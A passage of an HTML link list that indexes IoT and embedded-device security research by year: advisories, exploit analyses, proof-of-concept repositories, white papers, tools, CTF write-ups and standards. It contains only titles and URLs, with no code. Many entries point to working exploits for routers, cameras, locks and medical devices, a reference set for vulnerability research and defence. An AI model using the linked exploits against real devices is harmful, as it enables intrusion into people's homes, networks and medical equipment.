href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/call-an-exorcist-my-robots-possessed/">Call an Exorcist! 
My Robot’s Possessed!</a></li><li><a href="https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/">Backdoors and other vulnerabilities in HiSilicon based hardware video encoders</a></li><li><a href="https://www.pentestpartners.com/security-blog/speed-2-the-poseidon-adventure-when-cruise-ships-attack-part-1/">Speed 2 – The Poseidon Adventure</a> <a href="https://www.pentestpartners.com/security-blog/speed-2-the-poseidon-adventure-when-cruise-ships-attack-part-2/">Part 2</a></li><li><a href="https://labs.ioactive.com/2020/09/no-buffers-harmed-rooting-sierra.html?spref=tw">No buffers harmed: Rooting Sierra Wireless AirLink devices through logic bugs</a></li><li><a href="https://www.pentestpartners.com/security-blog/360lock-smart-lock-review/">360lock Smart Lock Review</a></li><li><a href="https://www.criticalstart.com/critical-vulnerabilities-discovered-in-mofi-routers/">Critical Vulnerabilities Discovered in MoFi Routers</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r8300-upnpd-preauth-rce/">Netgear Nighthawk R8300 upnpd PreAuth RCE</a> <a href="https://paper.seebug.org/1311/">Analysis and reproduction</a></li><li><a href="https://research.checkpoint.com/2020/dont-be-silly-its-only-a-lightbulb/">Don’t be silly – it’s only a lightbulb</a></li><li><a href="https://faruktuygun.com/directorytraversal.html">Ruijie Networks Switch Version S29_RGOS 11.4(1)B12P11 eWeb Directory Traversal</a></li><li><a href="https://research.loginsoft.com/vulnerability/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/">Multiple Vulnerabilities discovered in the D-link Firmware DIR-816L</a> <a href="https://www.4hou.com/posts/7Ozy">Chinese translation</a></li><li><a href="https://guillaumebour.fr/articles/security_testing_pacemaker_ecosystem/part_1_introduction_context_methodology/">Security testing of the pacemaker ecosystem Part 1</a> <a href="https://guillaumebour.fr/articles/">All parts</a> <a href="https://www.4hou.com/posts/RwrO">Chinese translation of Part 1</a></li><li><a 
href="https://www.pentestpartners.com/security-blog/threat-modelling-and-iot-hubs/">Threat modelling and IoT hubs</a></li><li><a href="https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68">Tenda AC15 AC1900 Vulnerabilities Discovered and Exploited</a></li><li><a href="https://www.karansaini.com/os-command-injection-v-sol/">ARBITRARY OS COMMAND INJECTION ON V-SOL HOME ROUTERS</a></li><li><a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/my-adventures-hacking-the-iparcelbox/?hilite='iParcelBox'">My Adventures Hacking the iParcelBox</a></li><li><a href="https://www.pentestpartners.com/security-blog/hacking-smart-devices-to-convince-dementia-sufferers-to-overdose/">Hacking smart devices to convince dementia sufferers to overdose</a></li><li><a href="https://pierrekim.github.io/blog/2020-07-07-cdata-olt-0day-vulnerabilities.html">Multiple vulnerabilities found in CDATA OLTs</a></li><li><a href="https://www.pentestpartners.com/security-blog/pwning-smart-garage-door-openers/">Pwning smart garage door openers</a></li><li><a href="https://full-disclosure.eu/reports/2019/FDEU-CVE-2019-10222-telia-savitarna-backdoor.html">RCE on Telia Routers</a></li><li><a href="https://lp.firedome.io/hubfs/Yale%20WIPC-301W%20RCE%20Vulnerability%20Report%205-6.pdf">0-Day Vulnerabilities in Yale IP Cameras</a></li><li><a href="https://securityintelligence.com/posts/vulnerable-powerline-extenders-underline-lax-iot-security/">Multiple vulnerabilities in Tenda PA6 Wi-Fi Powerline extender</a></li><li><a href="https://www.zerodayinitiative.com/blog/2020/6/24/zdi-20-709-heap-overflow-in-the-netgear-nighthawk-r6700-router">ZDI-20-709: HEAP OVERFLOW IN THE NETGEAR NIGHTHAWK R6700 ROUTER</a> <a href="https://www.anquanke.com/post/id/209217">Chinese translation</a> <a href="https://www.anquanke.com/post/id/209232">Analysis</a> <a 
href="https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md">GitHub</a></li><li><a href="https://blog.grimm-co.com/2020/06/soho-device-exploitation.html">79 Netgear router models httpd Firmware Upload Stack-based Buffer Overflow Remote Code</a> <a href="https://github.com/grimm-co/NotQuite0DayFriday/tree/master/2020.06.15-netgear">POC</a></li><li><a href="https://www.jsof-tech.com/ripple20/">Ripple20: 19 Zero-Day Vulnerabilities Amplified by the Supply Chain</a> <a href="https://www.jsof-tech.com/wp-content/uploads/2020/06/JSOF_Ripple20_Technical_Whitepaper_June20.pdf">Whitepaper 1</a></li><li><a href="https://unit42.paloaltonetworks.com/6-new-d-link-vulnerabilities-found-on-home-routers/">6 New Vulnerabilities Found on D-Link Home Routers</a></li><li><a href="https://limitedresults.com/2020/06/nrf52-debug-resurrection-approtect-bypass/">nRF52 Debug Resurrection (APPROTECT Bypass)</a></li><li><a href="https://callstranger.com/">CVE-2020-12695: UPnP CallStranger</a></li><li><a href="https://douevenknow.us/post/619763074822520832/an-el1el3-coldboot-vulnerability">An EL1/EL3 coldboot vulnerability affecting 7 years of LG Android devices</a></li><li><a href="https://research.hisolutions.com/2020/04/open-the-gates-insecurity-of-cloudless-smart-door-systems/">Open the Gates! 
The (In)Security of Cloudless Smart Door Systems</a></li><li><a href="https://github.com/chengcheng227/CVE-POC">ASUS and Xiaomi smart home devices</a></li><li><a href="https://surfingattack.github.io/">SurfingAttack: stealthy interaction with voice assistants via ultrasonic waves</a></li><li><a href="https://cablehaunt.com/">Cable Haunt: Broadcom kernel vulnerability</a></li><li><a href="https://www.welivesecurity.com/wp-content/uploads/2020/02/ESET_Kr00k.pdf">CVE-2019-15126: Kr00k Wi-Fi encryption flaw</a></li><li><a href="https://research.nccgroup.com/2020/02/10/interfaces-d-to-rce/">Mozilla WebThings IoT gateway Interfaces.d to RCE</a></li><li><a href="https://habr.com/en/post/486856/">0day vulnerability (backdoor) in firmware for HiSilicon-based DVRs, NVRs and IP cameras</a></li><li><a href="http://www.simonweckert.com/googlemapshacks.html">Google Maps Hacks</a></li><li><a href="https://blog.checkpoint.com/2020/02/05/the-dark-side-of-smart-lighting-check-point-research-shows-how-business-and-home-networks-can-be-hacked-from-a-lightbulb/">How Business and Home Networks Can Be Hacked from a Lightbulb</a></li><li><a href="https://zhuanlan.zhihu.com/p/355484418">CNVD-2021-14536: Ruijie RG-UAC unified internet access management and audit system information disclosure vulnerability</a></li><li><a href="https://jfrog.com/blog/major-vulnerabilities-discovered-in-qualcomm-qcmap/?vr=1">Vulnerabilities Discovered in Qualcomm QCMAP enable remote root access</a></li><li><a href="https://xuanxuanblingbling.github.io/iot/2020/07/08/stm32/">SCTF 2020 Password Lock Plus: an introduction to STM32 reverse engineering</a></li><li><a href="https://www.blackhillsinfosec.com/machine-in-the-middle-mitm-ble-attack/">Machine-in-the-Middle (MitM) BLE Attack</a></li></ul><h2 id="2019"><a href="#2019" class="headerlink" title="2019"></a>2019</h2><ul><li><a href="https://pulsesecurity.co.nz/articles/TPM-sniffing">Extracting BitLocker keys from a TPM</a></li><li><a href="http://www.caict.ac.cn/kxyj/qwfb/bps/201911/P020191115523217021278.pdf">IoT Terminal Security White Paper (2019)</a></li><li><a 
href="https://note.youdao.com/coshare/index.html?token=91D38BE5B19F41A3865D62A6D1D11D53&gid=101995961">Smart City Cybersecurity White Paper</a></li><li><a href="http://www.caict.ac.cn/kxyj/qwfb/bps/201912/P020191219401564573602.pdf">2019 Internet Devices: Smart Speaker Security White Paper</a></li><li><a href="https://mp.weixin.qq.com/s/suXWmn_PM6zmm3loYO1Zgw">Venustech ADLab: Smart Speaker Cybersecurity and Privacy Research Report</a></li><li><a href="https://lightcommands.com/">Laser intrusion into voice-controlled systems</a></li><li><a href="https://www.armis.com/bleedingbit/">BLEEDINGBIT: THE HIDDEN ATTACK SURFACE WITHIN BLE CHIPS</a></li><li><a href="https://paper.seebug.org/1039/">CVE-2019-1663: analysis of a stack buffer overflow in multiple low-end Cisco devices</a></li><li><a href="https://github.com/oreosES/exploits/tree/master/CVE-2019-12272">CVE-2019-12272: OpenWrt LuCI web management interface command injection</a></li><li><a href="https://gsec.hitb.org/sg2019/sessions/4g-lte-man-in-the-middle-attacks-with-a-hacked-femtocell/">4G LTE Man in the Middle Attacks with a Hacked Femtocell</a> <a href="https://www.youtube.com/watch?v=EXNgKpCWbCM">Video</a> <a href="https://gsec.hitb.org/materials/sg2019/D2%20-%204G%20LTE%20Man%20in%20the%20Middle%20Attacks%20with%20a%20Hacked%20Femtocell%20-%20Xiaodong%20Zou.pdf">Slide</a></li><li><a href="https://airbus-seclab.github.io/ilo/INSOMNIHACK2019-Slides-Riding_the_lightning_iLO4_5_BMC_security_wrapup-perigaud-gazet-czarny.pdf">Riding the lightning: iLO4&5 BMC security wrap-up</a></li><li><a href="https://airbus-seclab.github.io/embedded_controller/BH2019-Slides-Breaking_Through_Another_Side_Bypassing_Firmware_Security_Boundaries_from_Embedded_Controller-matrosov-gazet.pdf">Breaking Through Another Side: Bypassing Firmware Security Boundaries from Embedded Controller</a></li><li><a href="https://medium.com/@s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-en-d94b47a15104">D-Link DIR-859 — Unauthenticated RCE (CVE-2019-17621) UPnP Command Injection</a></li><li><a href="https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-royal-vault-password-keeper/">Hacking Hardware Password Managers: Royal Vault 
Password Keeper (COMS Flash)</a></li><li><a href="https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-passwordsfast/">Hacking Hardware Password Managers: passwordsFAST (I2C Flash)</a></li><li><a href="https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-the-reczone/">Hacking Hardware Password Managers: The RecZone (SPI Flash)</a></li><li><a href="https://mjg59.dreamwidth.org/53968.html">Wifi deauthentication attacks and home security</a></li><li><a href="https://blog.rapid7.com/2019/12/11/iot-vuln-disclosure-childrens-gps-smart-watches-r7-2019-57/">Children’s GPS Smart Watches (R7-2019-57)</a></li><li><a href="https://puzzor.github.io/Linksys-Velop-Authentication-bypass">Linksys Velop authentication bypass</a></li><li><a href="https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/report/report.md">Xiaomi router series remote command execution vulnerabilities (CVE-2019-18370, CVE-2019-18371)</a></li><li><a href="https://alephsecurity.com/2019/07/01/xiaomi-zigbee-1/">Xiaomi Smart Plug (ZNCZ02LM)</a> <a href="https://alephsecurity.com/2019/07/09/xiaomi-zigbee-2/">Part 2: Beyond Architecture</a> <a href="https://alephsecurity.com/2019/07/15/xiaomi-zigbee-3/">Part 3: Live Debugging</a></li><li><a href="https://bbs.hassbian.com/thread-8903-1-1.html">The story of the green-board Xiao AI speaker after an update enabled a root password</a></li><li><a href="https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-in-zte-mobile-hotspot-ms910s-cve-2019-3422/">Multiple Vulnerabilities in ZTE mobile Hotspot MS910S (hard-coded credentials, n-day)</a></li><li><a href="https://devco.re/blog/2019/11/11/HiNet-GPON-Modem-RCE/">Chunghwa Telecom modem remote code execution vulnerability</a></li><li><a href="http://0x42424242.in/xiongmai/">Xiongmai Camera - Investigational Journey</a></li><li><a href="https://lightcommands.com/">Laser-Based Audio Injection on Voice-Controllable Systems</a></li><li><a href="https://hacked.camera/">Security cameras vulnerable to hijacking</a></li><li><a href="https://srlabs.de/bites/sim_attacks_demystified/">After SIMJacker, 
WIBattack hacking technique disclosed. Billions of users at risk</a></li><li><a href="https://www.pentestpartners.com/security-blog/cve-2019-12103-analysis-of-a-pre-auth-rce-on-the-tp-link-m7350-with-ghidra/">CVE-2019-12103 – Analysis of a Pre-Auth RCE on the TP-Link M7350</a></li><li><a href="https://research.checkpoint.com/say-cheese-ransomware-ing-a-dslr-camera/">Say Cheese: Ransomware-ing a DSLR Camera</a></li><li><a href="https://blog.rapid7.com/2019/08/01/r7-2019-18-multiple-hickory-smart-lock-vulnerabilities/">Multiple Hickory Smart Lock Vulnerabilities</a></li><li><a href="https://zh-cn.tenable.com/security/research/tra-2019-36?tns_redirect=true">Unauthenticated access to the VideoTalk audio download function in some Dahua products</a></li><li><a href="http://github.com/mame82/UnifyingVulnsDisclosureRepo">Logitech Unifying Vulns</a></li><li><a href="https://blackmarble.sh/zipato-smart-hub/">Breaking & Entering with Zipato SmartHubs</a></li><li><a href="https://www.pentestpartners.com/security-blog/ewon-flexy-iot-router-a-deep-dive/">Ewon Flexy IoT Router. 
A Deep dive</a></li><li><a href="https://securityintelligence.com/buffer-overflow-vulnerability-in-tp-link-routers-can-allow-remote-attackers-to-take-control/">Buffer Overflow Vulnerability in TP-Link Routers Can Allow Remote Attackers to Take Control</a></li><li><a href="https://research.checkpoint.com/we-decide-what-you-see-remote-code-execution-on-a-major-iptv-platform/">We Decide What You See: Remote Code Execution on a Major IPTV Platform</a></li><li><a href="https://securityintelligence.com/posts/critical-rce-vulnerability-in-tp-link-wi-fi-extenders-can-grant-attackers-remote-control/">CVE-2019-7406: Critical RCE Vulnerability in TP-Link Wi-Fi Extenders Can Grant Attackers Remote Control</a></li><li><a href="https://www.anquanke.com/post/id/175625">路由器漏洞挖掘之 DIR-805L 越权文件读取漏洞分析</a></li><li><a href="https://www.zerodayinitiative.com/blog/2019/6/6/mindshare-hardware-reversing-with-the-belkin-surf-n300-router">MINDSHARE: HARDWARE REVERSING WITH THE BELKIN SURF N300 ROUTER</a></li><li><a href="https://research.checkpoint.com/we-decide-what-you-see-remote-code-execution-on-a-major-iptv-platform/">乌克兰IPTV平台——Infomir的远程代码执行漏洞利用分析</a></li><li><a href="https://github.com/bnbdr/wd-rce/">WD My Cloud RCE</a></li><li><a href="https://ezequieltbh.me/posts/2019/05/love-is-in-the-air-reverse-engineering-a-shitty-drone/">Love is in the air: Reverse Engineering a shitty drone</a></li><li><a href="https://fidusinfosec.com/exploiting-10000-devices-used-by-britains-most-vulnerable/">EXPLOITING 10,000+ DEVICES USED BY BRITAIN’S MOST VULNERABLE</a></li><li><a href="https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170">Invading Your Personal Cloud — ISE Labs Exploits the Seagate stcr3000101</a></li><li><a href="https://badpackets.net/over-25000-linksys-smart-wi-fi-routers-vulnerable-to-sensitive-information-disclosure-flaw/">Over 25,000 Linksys Smart Wi-Fi routers vulnerable to sensitive information disclosure 
flaw</a></li><li><a href="https://www.tenable.com/security/research/tra-2019-20">OEM Presentation Platform Vulnerabilities</a></li><li><a href="https://ssd-disclosure.com/archives/2910">ZyXEL / Billion Multiple Vulnerabilities</a></li><li><a href="https://www.tenable.com/security/research/tra-2019-20">Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection</a></li><li><a href="https://blog.talosintelligence.com/2019/04/vulnerability-sierra-airlink.html">Multiple vulnerabilities in Sierra Wireless AirLink ES450</a></li><li><a href="https://github.com/tiagorlampert/CHAOS">CVE-2019-1652/CVE-2019-1653 Exploits For Cisco RV320</a></li><li><a href="https://twitter.com/mjg59/status/1111106885736787975">Arbitrary Command Execution On The TP-Link SR20 Smart Hub And Router</a></li><li><a href="https://github.com/scarvell/grandstream_exploits/">Grandstream 设备中的 RCE 漏洞 EXPLOIT 集合</a></li><li><a href="https://www.cymotive.com/wp-content/uploads/2019/03/Hell2CAP-0day.pdf">BlueSDK Hell2CAP 0day</a></li><li><a href="https://blackmarble.sh/zipato-smart-hub/">Breaking & Entering with Zipato SmartHubs</a></li><li><a href="https://www.fortinet.com/blog/threat-research/d-link-routers-found-vulnerable-rce">Multiple D-Link Routers Found Vulnerable To Unauthenticated Remote Code Execution(命令注入)</a></li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2018-0749">Sierra Wireless AirLink ES450 ACEManager upload.cgi Unverified Password Change Vulnerabilit</a></li><li><a href="https://0x41.cf/reversing/2019/10/08/unlocking-nokia-g240wa.html">Unlocking IAM’s Nokia G-240W-A router (Part 1) </a></li><li><a href="https://eclypsium.com/2019/09/03/usbanywhere-bmc-vulnerability-opens-servers-to-remote-attack/">USBAnywhere:Virtual Media Vulnerability in BMC Opens Servers to Remote Attack</a></li><li><a href="https://securelist.com/hacking-microcontroller-firmware-through-a-usb/89919/">Hacking microcontroller firmware through a USB</a></li><li><a 
href="https://www.cnblogs.com/yangmzh3/p/11214451.html">Summary of VxWorks firmware analysis methods</a></li><li><a href="https://www.cnblogs.com/yangmzh3/p/11231423.html">Analysis of the NOE77101 firmware backdoor vulnerability</a></li></ul><h2 id="2018"><a href="#2018" class="headerlink" title="2018"></a>2018</h2><ul><li><a href="http://www.caict.ac.cn/kxyj/qwfb/bps/201809/P020180919390470911802.pdf">IoT Security White Paper (2018)</a></li><li><a href="https://research.nccgroup.com/2020/12/18/domestic-iot-nightmares-smart-doorbells/">Domestic IoT Nightmares: Smart Doorbells</a></li><li><a href="https://github.com/tencentbladeteam/Exploit-Amazon-Echo">[DEF CON 26] Breaking Smart Speaker - Exploit Amazon Echo</a> <a href="http://m.elecfans.com/article/729418.html">How to hack into an Amazon Echo speaker: eavesdropping and recording</a></li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2018-0512">CVE-2018-3833: Insteon Hub PubNub Firmware Downgrade Vulnerability</a></li><li><a href="https://github.com/airbus-seclab/ilo4_toolbox">Toolbox for HPE iLO4 & iLO5 analysis</a></li><li><a href="https://airbus-seclab.github.io/ilo/ZERONIGHTS2018-Slides-EN-Turning_your_BMC_into_a_revolving_door-perigaud-gazet-czarny.pdf">Slide: Turning your BMC into a revolving door</a></li><li><a href="https://airbus-seclab.github.io/ilo/SSTIC2018-Article-subverting_your_server_through_its_bmc_the_hpe_ilo4_case-gazet_perigaud_czarny.pdf">Backdooring your server through its BMC</a> <a href="https://airbus-seclab.github.io/ilo/SSTIC2018-Article-subverting_your_server_through_its_bmc_the_hpe_ilo4_case-gazet_perigaud_czarny.pdf">Slide</a></li><li><a href="https://airbus-seclab.github.io/ilo/RECONBRX2018-Slides-Subverting_your_server_through_its_BMC_the_HPE_iLO4_case-perigaud-gazet-czarny.pdf">Slide: Subverting your server through its BMC</a></li><li><a href="https://airbus-seclab.github.io/embedded_controller/BH2019-Slides-Breaking_Through_Another_Side_Bypassing_Firmware_Security_Boundaries_from_Embedded_Controller-matrosov-gazet.pdf">Breaking Through Another Side: Bypassing Firmware Security Boundaries from Embedded Controller</a></li><li><a href="https://research.checkpoint.com/2018/sending-fax-back-to-the-dark-ages/">Faxploit: Sending Fax Back to the Dark Ages</a></li><li><a href="https://blog.talosintelligence.com/2019/01/vulnerability-deep-dive-tp-link.html">TP-Link TL-R600 VPN remote code execution vulnerabilities</a></li><li><a href="https://github.com/iceMatcha/Some-Vulnerabilities-of-D-link-Dir815/blob/master/Vulnerabilities_Summary.md">CVE-2018-10106: D-Link DIR-815 permission bypass and information disclosure</a> <a href="https://ray-cp.github.io/archivers/d-link-getcfg_php-info-leak">Analysis</a></li><li><a href="https://www.schneider-electric.com/en/download/document/SEVD-2018-354-01/">Security Notification – EVLink Parking</a></li><li><a href="https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/">Guardzilla IoT Video Camera Hard-Coded Credentials (CVE-2018-5560)</a></li><li><a href="https://blog.securityevaluators.com/terramaster-nas-vulnerabilities-discovered-and-exploited-b8e5243e7a63">TerraMaster NAS Vulnerabilities Discovered and Exploited</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/">TerraMaster OS exportUser.php Remote Code Execution</a></li><li><a href="https://blog.talosintelligence.com/2018/07/sony-ipela-vulnerability-spotlight-multiple.html">Multiple Vulnerabilities in Sony IPELA E Series Camera</a></li><li><a href="https://blog.talosintelligence.com/2018/07/samsung-smartthings-vulns.html?m=1">Multiple Vulnerabilities in Samsung SmartThings Hub</a></li><li><a href="https://www.pentestpartners.com/security-blog/hacking-swann-home-security-camera-video/">Hacking Swann & FLIR/Lorex home security camera video</a></li><li><a href="https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/">VDOO Discovers Significant Vulnerabilities in Axis Cameras</a></li><li><a href="https://blog.vdoo.com/2018/06/06/vdoo-has-found-major-vulnerabilities-in-foscam-cameras/">Major Vulnerabilities in Foscam Cameras</a></li><li><a href="https://github.com/yough3rt/IOT-pwn-for-fun/">CVE-2018-11481: Remote code execution vulnerability in multiple TP-LINK products</a></li><li><a href="https://embedi.com/blog/whos-watching-the-watchers-vol-ii-norton-core-secure-wifi-router/">Who’s Watching the Watchers (Vol. II): Norton Core Secure WiFi Router</a></li><li><a href="https://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities">Quest DR Series Disk Backup Multiple Vulnerabilities</a></li><li><a href="https://www.indigofuzz.com/article.php?docid=talktalk1430">TalkTalk Router - WPS Exploit</a></li><li><a href="https://securelist.com/backdoors-in-d-links-backyard/85530/">Backdoors in D-Link’s backyard (Multiple vulnerabilities in D-Link DIR-620 router)</a></li><li><a href="https://www.draytek.co.uk/support/security-advisories/kb-advisory-csrf-and-dns-dhcp-web-attacks">DrayTek Routers: CSRF & DNS Changed Web Interface Attacks</a></li><li><a href="https://github.com/ezelf/CVE-2018-9995_dvr_credentials">CVE-2018-9995: Get DVR Credentials</a></li><li><a href="https://www.fireeye.com/blog/threat-research/2018/05/rooting-logitech-harmony-hub-improving-iot-security.html">Rooting a Logitech Harmony Hub: Improving Security in Today’s IoT World</a></li><li><a href="https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/">Critical Vulnerability Found in Majority of LG NAS Devices</a> <a href="https://www.cesafe.com/html/3962.html">Translation</a></li><li><a href="https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/">Critical RCE Vulnerability Found in Over a Million GPON Home Routers</a></li><li><a href="https://www.bleepingcomputer.com/news/security/5-000-routers-with-no-telnet-password-nothing-to-see-here-move-along/">5,000 routers in Brazil with no Telnet password set by default can be easily hijacked</a></li><li><a href="https://www.exploit-db.com/exploits/40500/">AVTECH IP Camera/NVR/DVR Devices - Multiple Vulnerabilities</a></li><li><a href="https://www.tenable.com/blog/tenable-research-advisory-axis-camera-app-malicious-package-distribution-weakness">AXIS Camera App Malicious Package Distribution Weakness</a> <a href="https://github.com/rapid7/metasploit-framework/pull/16190">EXP</a></li><li><a href="https://research.checkpoint.com/2018/dji-drone-vulnerability/">DJI Drone Vulnerability</a></li><li><a href="https://paper.seebug.org/430/">Android Bluetooth remote command execution exploitation in practice: from PoC to exploit</a></li><li><a href="https://bbs.kanxue.com/thread-254358.htm">Mobile baseband security research series, part 1: concepts and systems</a></li><li><a href="https://www.anquanke.com/post/id/149698">PWN2OWN: a journey into cracking the Shannon baseband</a> <a href="https://github.com/comsecuris/shannonRE">Github</a></li></ul><h2 id="2017"><a href="#2017" class="headerlink" title="2017"></a>2017</h2><ul><li><a href="https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html">Over The Air: Exploiting Broadcom’s Wi-Fi Stack (Part 1)</a></li><li><a href="https://www.exploit-db.com/docs/english/44003-hisilicon-dvr-hack.pdf">HiSilicon DVR hack</a></li><li><a href="https://conference.hitb.org/hitbsecconf2017ams/sessions/femtocell-hacking-from-zero-to-zero-day/#">Femtocell Hacking: From Zero to Zero Day</a> <a href="http://conference.hitb.org/hitbsecconf2017ams/materials/D1T2%20-%20JeongHoon%20Shin%20-%20Femotcell%20Hacking.pdf">Slide</a></li><li><a href="https://www.bastille.net/research/vulnerabilities/cabletap/cabletap-affected-devices">CableTap: a wide array of critical vulnerabilities in ISP-provided, RDK-based wireless gateways and set-top boxes</a> <a href="https://raw.githubusercontent.com/BastilleResearch/CableTap/master/doc/pdf/DEFCON-25-Marc-Newlin-CableTap-White-Paper.pdf">White Paper</a></li><li><a href="https://paper.seebug.org/488/">GoAhead remote code execution vulnerability (CVE-2017-17562): analysis and practice</a></li><li><a 
href="http://blog.asiantuntijakaveri.fi/2017/03/backdoor-and-root-shell-on-zte-mf286.html">Backdoor and root shell on ZTE MF286</a></li></ul><h2 id="2016"><a href="#2016" class="headerlink" title="2016"></a>2016</h2><ul><li><a href="https://github.com/jacob-baines/veralite_upnp_exploit_poc">Veralite UPnP Exploit</a></li><li><a href="http://colinoflynn.com/2016/07/getting-root-on-philips-hue-bridge-2-0/">Getting Root on Philips Hue Bridge 2.0</a> <a href="http://colinoflynn.com/wp-content/uploads/2016/08/Towards-a-Lightbulb-Worm-Combined.pdf">Slide 1</a> <a href="http://colinoflynn.com/wp-content/uploads/2016/08/us-16-OFlynn-A-Lightbulb-Worm-wp.pdf">Slide 2</a></li><li><a href="https://www.coresecurity.com/advisories/tp-link-tddp-multiple-vulnerabilities">TP-LINK TDDP Multiple Vulnerabilities</a></li></ul><h2 id="安全研究"><a href="#安全研究" class="headerlink" title="安全研究"></a>Security Research</h2><ul><li><a href="https://www.kawabangga.com/posts/4935">Setting routing rules per process</a></li><li><a href="https://blog.spacehuhn.com/digispark-vid-pid">Change USB VID & PID on Digispark</a></li><li><a href="https://networklogician.com/2021/04/17/sniffing-ssh-passwords/">Sniffing SSH Passwords</a></li><li><a href="https://lude.rs/h4ck1ng/rootless_sniffing.html">Rootless Sniffing: Unix Domain Socket MITM</a></li><li><a href="https://jamchamb.net/2022/01/02/modify-vmlinuz-arm.html">Modifying Embedded Filesystems in ARM Linux zImages</a></li><li><a href="https://www.riverloopsecurity.com/blog/2021/07/nand-dump-repair/">Repairing a Broken Huawei NAND Dump and Single-Bit Errors</a></li><li><a href="https://01001000.xyz/2021-04-21-Hiding-a-Trojan-in-an-AVR-Arduino-Bootloader/">FLAW3D: Hiding a Trojan in an AVR Arduino Bootloader</a></li><li><a href="https://gorgias.me/2019/12/27/固件提取系列-UBI文件系统提取以及重打包/">Firmware extraction series: extracting and repacking UBI filesystems</a></li><li><a href="https://plantegg.github.io/2018/01/01/通过tcpdump对Unix Socket 进行抓包解析/">Capturing and parsing Unix Domain Socket traffic with tcpdump</a></li><li><a href="https://www.anquanke.com/post/id/269885">NFC turns out to have high-risk vulnerabilities too: see how they were analyzed</a></li><li><a href="https://bbs.pediy.com/thread-271543.htm">BLECTF: Bluetooth Low Energy CTF challenge</a></li><li><a href="https://0x434b.dev/overview-of-glibc-heap-exploitation-techniques/">Overview of GLIBC heap exploitation techniques</a></li><li><a href="https://0x434b.dev/misc-study-notes-about-arm-aarch64-assembly-and-the-arm-trusted-execution-environment-tee/">MISC study notes about ARM AArch64 Assembly and the ARM Trusted Execution Environment (TEE)</a></li><li><a href="https://secnigma.wordpress.com/2022/01/18/a-beginners-guide-into-router-hacking-and-firmware-emulation/">A Beginner’s guide into Router Hacking and Firmware Emulation</a></li><li><a href="https://blog.3or.de/starting-embedded-reverse-engineering-freertos-libopencm3-on-stm32f103c8t6.html">Starting Embedded Reverse Engineering: FreeRTOS, libopencm3 on STM32F103C8T6</a></li><li><a href="https://lupyuen.github.io/articles/wifi">Reverse Engineering WiFi on RISC-V BL602</a></li><li><a href="https://www.devalias.net/devalias/2018/05/13/usb-reverse-engineering-down-the-rabbit-hole/">USB Reverse Engineering: Down the rabbit hole</a></li><li><a href="https://blog.3or.de/arm-exploitation-return-oriented-programming.html">ARM Exploitation: Return oriented Programming</a></li><li><a href="https://cwe.mitre.org/scoring/lists/2021_CWE_MIHW.html">CWE Most Important Hardware Weaknesses</a></li><li><a href="https://www.riverloopsecurity.com/blog/2021/09/introducing-flash-bash/">Introducing Flash BASH (U-Boot glitching)</a></li><li><a href="https://carvesystems.com/news/pin2pwn-how-to-root-an-embedded-linux-box-with-a-sewing-needle/">pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle</a></li><li><a href="https://eprint.iacr.org/2006/054.pdf">How to Build a Low-Cost, Extended-Range RFID Skimmer</a></li><li><a href="https://www.eetimes.com/anti-tamper-real-time-clock-rtc-make-your-embedded-system-secure/">Anti tamper real time clock (RTC) - make your embedded system secure</a></li></ul><h2 id="工具"><a href="#工具" class="headerlink" title="工具"></a>Tools</h2><ul><li><a href="https://redballoonsecurity.com/flash-dump/">Flash Dump Made Easy With OFRAK</a></li><li><a href="https://github.com/nccgroup/sniffle">nccgroup/Sniffle: A sniffer for Bluetooth 5 and 4.x LE</a></li><li><a href="https://blog.quarkslab.com/binbloom-blooms-introducing-v2.html">Binbloom blooms: a tool to find the base address of any 32 and 64-bit architecture firmware</a></li><li><a href="https://www.riverloopsecurity.com/blog/2021/09/introducing-flash-bash/">Introducing Flash BASH</a></li></ul><h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>Other</h2><ul><li><a href="https://mp.weixin.qq.com/s/tRmWsRfF2yRszwSeXws5xg">2022 Xihu Lunjian IoT-AWD official challenge write-up (part 1): firmware 1 & firmware 2</a></li><li><a href="https://mp.weixin.qq.com/s/_1uLWXSPEiCFST6dsi0YBA">2022 Xihu Lunjian IoT-AWD official challenge write-up (part 2): firmware 3</a></li></ul><h2 id="标准"><a href="#标准" class="headerlink" title="标准"></a>Standards</h2><ul><li><a href="http://c.gb688.cn/bzgk/gb/showGb?type=online&hcno=BBE3572A88B87C3D92AF6DE2C424E0BB">Information security technology: IoT security reference model and general requirements</a></li><li><a href="https://www.miit.gov.cn/gzcy/yjzj/art/2021/art_de99ecee64884ecda932604c32631b76.html">Guidelines for Building the IoT Basic Security Standards System (draft for comments)</a></li><li><a href="https://www.etsi.org/deliver/etsi_en/303600_303699/303645/02.01.01_60/en_303645v020101p.pdf">EN 303 645 - V2.1.1 - CYBER; Cyber Security for Consumer Internet of Things: Baseline Requirements</a></li><li><a 